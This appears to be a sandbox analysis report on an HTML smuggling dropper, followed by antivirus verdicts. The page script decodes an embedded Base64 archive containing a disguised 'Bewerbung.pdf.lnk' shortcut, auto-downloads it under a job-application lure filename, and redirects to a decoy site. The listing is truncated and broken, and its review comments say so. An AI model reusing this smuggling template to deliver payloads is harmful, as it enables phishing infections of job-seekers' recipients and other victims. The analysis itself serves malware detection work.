Static | ZeroBOX
No static analysis available.
<!-- code from https://outflank.nl/blog/2018/08/14/html-smuggling-explained/ -->
<html>
<body>
<script>
/**
 * Decode a Base64 string into its raw bytes.
 *
 * In this page the helper turns the embedded Base64 literal back into binary
 * data entirely inside the browser, before it is wrapped in a Blob.
 *
 * @param {string} base64 - Base64-encoded text.
 * @returns {ArrayBuffer} Buffer holding one byte per decoded character.
 */
function base64ToArrayBuffer(base64) {
  // atob() yields a "binary string": every character code is a byte value 0-255.
  const decoded = window.atob(base64);
  const bytes = Uint8Array.from(decoded, (ch) => ch.charCodeAt(0));
  return bytes.buffer;
}
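// 32bit simple reverse shell
// NOTE(review): this label appears to be carried over from the referenced PoC and does not
// describe the data below. The Base64 literal begins with the RAR5 signature ("Rar!" 1A 07 01 00)
// and contains the entry name "Bewerbung.pdf.lnk", i.e. an archive holding a double-extension
// Windows shortcut. The literal is unterminated in this listing (no closing quote), so the
// payload shown here is likely truncated.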
var file = 'UmFyIRoHAQARnomCDAEFCAAHAQGqxbuAAC25JsktAgMLzgYE9AsgzEUivYAdABFCZXdlcmJ1bmcucGRmLmxuawoDAjJYwJA/ttsByNtKAziGRFMi9FBXygKg9J0qQCAgkAQggctpToqjDpgWiRthZGkrWQUoJVKFWiUIrI+CJBQ8mMViJBU6GMSKEgjBAh4MZHxJVkR6hjFZFgwQvgxWD43bw3OW3lCqw8X8M3ZvM5ub9n25n27zn5Bmc+5m/Z0bm/f/9mzmb474c/EKQABBsnoDrZAE5Q6APoRY+j/BfbGxbz2IE+b7vFue+Vp+cLh7CwHX1gPFkhSkIpT71DSLzEq+A7HpKUSRhnWhglZ9KtA3xvQQuG2iyTfoAFa+tXVzNkE4D8D4Gdj2ihmm6iyoxpQQ9zqjgUDzC2HIiSxALwrQXBXAzAsYW0ICx2cfJ9JKrJkrUK5eW0aedmfInJJccmeWDJ6w5L4lghZCSKeqBxLhLGoUZkiJDXfMWdvHiwqGC6UqbGpb9Oet7m+AmR86+E6+Oz81s0hYgGAzaUAsGxHB0yb1GREOgjmybf5O3QLZ7bNNxnmQBzwqluUqWn04tPksI0Tot1v9fOnSK3+aUteZahgjhFOYBfPGHKb+IIIwJUXcWVbNGZjgsHghxxIcIQGIiqoQ5tHOiqvNFhUoygt69xs7LSv0ZVtNl5HAGEcWGzISJSisG4oYXo/3UiLctymdcOfvIaXKa4KtNd5Pa+fjzOVtjtOncKC6pnKpXVLLiV9cxk6xGiYTCQsyS+3d52DMwk5aItDs76GxFz7DrKCRjM+B7v6q/xIXvP3+pa9+X49fhNWrZCqUqs0zG9c+FrRX35aQd2yqoxgduDt5inPL2wKODRJhUpkAKJS/64faVCXgOpcNFH8oqrNCj9In9xrd1JPw51NQ4tJMz/h/cH0I/psMnikPhNlSFQyeQjhI2ROPVvFbMtxhor2YG7nTSDnRtkJqaLz6jF7LD7mD
// Download stage: the embedded Base64 literal is decoded in the page and handed to the
// browser as a file. The file bytes are never fetched as a separate network object, so
// controls that only inspect downloads in transit see just this HTML document.
// Static indicators visible here: large Base64 literal + atob() + Blob + createObjectURL()
// + an anchor with a `download` attribute + a scripted click().
var data = base64ToArrayBuffer(file);
// 'octet/stream' is not a registered MIME type (the registered one is application/octet-stream);
// the Blob is still treated as opaque binary.
var blob = new Blob([data], {type: 'octet/stream'});
// File name shown to the user; German for "My application documents Celina" (job-application lure).
// The name claims .7z; it is set independently of the decoded content.
var fileName = 'Meine Bewerbungsunterlagen Celina.7z';
// Legacy Internet Explorer / old Edge API for saving a Blob; used when the browser exposes it.
if (window.navigator.msSaveOrOpenBlob) {
window.navigator.msSaveOrOpenBlob(blob,fileName);
} else {
// Other browsers: build an invisible <a download> element and click it from script,
// so the save is started by the page itself rather than by a user action.
var a = document.createElement('a');
// Debug output of the anchor element; has no effect on the download.
console.log(a);
document.body.appendChild(a);
a.style = 'display: none';
// blob: URL that points at the in-memory data.
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
// The object URL is released right after the click.
window.URL.revokeObjectURL(url);
}
//window.location.href = "https://meine-bewerbungsvorlage.de/";
//window.location.replace("http://www.w3schools.com");
// Redirect stage: after the download has been triggered, wait and then move the tab to
// another site. Presumably a decoy so the visit looks like a normal job-application
// resource; the report does not say who controls the target site.
// NOTE(review): the closing braces of loaddata() and sleep() are absent in this listing,
// so the script as shown would not parse; they were presumably lost during extraction.
async function loaddata() {
// sleep(2) resolves after 2 * 1100 ms = 2200 ms (see the multiplier in sleep()).
await sleep(2);
// Both calls target the same URL; location.replace() also removes this page from the
// tab's session history, so "Back" does not return to it.
window.location.href = "https://bewerbungsvorlagen.de/";
window.location.replace("https://bewerbungsvorlagen.de/");
// Promise-based delay helper: resolves after `seconds` * 1100 milliseconds.
async function sleep(seconds) {
return new Promise((resolve) => setTimeout(resolve, seconds *1100));
// Kicks off the delayed redirect when the page loads.
loaddata();
</script>
</body>
</html>
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX txt.trojan.cryxos
CAT-QuickHeal Clean
Skyhigh Clean
ALYac JS:Trojan.Cryxos.5130
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-HTML.Save.45cc6595
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 JS/TrojanDropper.Agent.PHD
TrendMicro-HouseCall Clean
Avast SVG:Smuggle-A [Drp]
Cynet Clean
Kaspersky Trojan-Downloader.Win32.Agent.xydfap
BitDefender JS:Trojan.Cryxos.5130
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan JS:Trojan.Cryxos.5130
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE JS:Trojan.Cryxos.5130
TrendMicro Clean
CMC Clean
Emsisoft JS:Trojan.Cryxos.5130 (B)
huorong HEUR:TrojanDropper/JS.Agent.bj
GData JS:Trojan.Cryxos.5130
Jiangmin Clean
Varist JS/Smuggling.A
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit JS:Trojan.Cryxos.D140A
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus VBS.PShell
MaxSecure Clean
Fortinet JS/Agent.PHD!tr
AVG SVG:Smuggle-A [Drp]
Panda Clean
alibabacloud Clean
No IRMA results available.